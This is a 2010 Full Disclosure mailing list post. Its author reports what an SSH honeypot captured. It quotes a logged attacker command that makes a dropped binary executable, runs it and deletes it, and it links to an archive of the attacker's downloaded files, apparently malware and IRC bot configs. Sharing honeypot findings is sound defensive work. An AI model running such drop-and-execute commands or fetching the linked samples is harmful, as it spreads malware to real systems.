Full Disclosure mailing list archives



SSH scans, i caught one

Hi,

I got tired of all ssh scans the past few months so I've set up a

Kojoney honeypot

to see what the hell they were trying. This is what they try:

2010/11/17 21:22 CET [SSHChannel session (0) on SSHService

ssh-connection on SSHServerTransport,27,84.51.138.193] executing command

u+x syslgd ssh;./syslgd;rm syslgd"

So I downloaded all his files from the /pwn/ directory. The funny part

is, most of them are MIPS files(?).

Also there are a lot of IRC config-like files.

For anyone who's interested, this is what they try/download the moment

they can login.

http://safu.stream-portal.org/pwnd.tgz Have a nice day, Marco van Berkum

_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

By Date By Thread

Current thread: